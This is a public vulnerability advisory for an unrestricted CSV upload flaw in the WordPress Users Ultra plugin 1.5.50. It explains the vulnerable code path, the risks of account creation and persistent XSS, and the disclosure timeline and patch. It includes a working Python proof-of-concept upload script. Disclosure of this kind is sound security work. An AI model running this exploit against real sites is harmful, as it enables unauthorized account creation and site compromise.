WordPress Users Ultra 1.5.50 Unrestricted File Upload
Source: https://twitter.com/panVagenas  Author: panVagenas  Published: 2015-11-18
* Exploit Title: WordPress Users Ultra Plugin [Unrestricted File Upload]
* Discovery Date: 2015/10/27
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps

Description
================================================================================

The WordPress plugin `Users Ultra Plugin` suffers from an unrestricted file upload vulnerability.

Any user (registered or not) can exploit a misbehavior of the plugin in order to upload csv files to the affected website. Although the plugin checks the file extension against an extension white-list (in this case only csv files are white-listed), no other checks (MIME type, size, etc.) take place. This alone can expose the affected website to a variety of attacks; see [OWASP Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload) to get an idea.

Details
================================================================================

The plugin workflow that could allow a malicious user to exploit this misbehavior is as follows:

1. Upon initialization of the plugin (at any time while it is activated) an instance of the `XooUserUser` class is created
2. In the constructor of the `XooUserUser` class a check for the POST variable `uultra-form-cvs-form-conf` takes place
    file `wp-content/plugins/users-ultra/xooclasses/xoo.userultra.user.php` lines 19-23
    ```php
    if (isset($_POST['uultra-form-cvs-form-conf'])) {
        /* Let's Update the Profile */
        $this->process_cvs($_FILES);
    }
    ```
3. Assuming the POST variable `uultra-form-cvs-form-conf` has been set in the request, the method `XooUserUser::process_cvs()` is called.
4. The `XooUserUser::process_cvs()` method processes every file in the `$_FILES` super-global, checking only whether the file has a `csv` extension

In addition we mark the following points:

1. A malicious user can create and activate user accounts by exploiting this vulnerability if `$_POST["uultra-activate-account"]` is set to `active`
2. A welcome email is sent if `$_POST["uultra-send-welcome-email"]` is set to 1
3. The csv files uploaded to the server are stored in a directory (`wp-content/usersultramedia/import` by default) accessible by anyone
4. Any additional columns present in the csv file are stored in `usermeta`
5. The lack of sanitization of values in the csv file can easily lead to a persistent XSS attack, so an attacker can compromise the whole site

PoC
================================================================================

The following Python3 script forms a csv file and uploads it to a site

```python
#!/usr/bin/python3
import requests
import csv
import tempfile

url = 'http://example.com/'
# Setting 'uultra-form-cvs-form-conf' is what makes the plugin call process_cvs()
postData = {
    'uultra-form-cvs-form-conf': 1,
    'uultra-send-welcome-email': 1,
    'uultra-activate-account': 'pending'
}
csvFileHeader = ['user name', 'email', 'display name', 'registration date', 'first name', 'last name', 'age', 'country']
csvFileRow = ['userName', 'email@example.com', 'User Name', '1/1/1', 'User', 'Name', '100', 'IO']

# Build the csv file in a temporary file and rewind it before upload
csvFile = tempfile.NamedTemporaryFile(mode='a+t', suffix='.csv')
wr = csv.writer(csvFile, quoting=csv.QUOTE_ALL, delimiter=',')
wr.writerow(csvFileHeader)
wr.writerow(csvFileRow)
csvFile.seek(0)

files = {'file.csv': csvFile}
r = requests.post(url, data=postData, files=files)
exit(0)
```

Timeline
================================================================================

2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form on his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email
2015/11/15 - Vendor responded
2015/11/15 - Patch released

Solution
================================================================================

Update to version 1.5.59
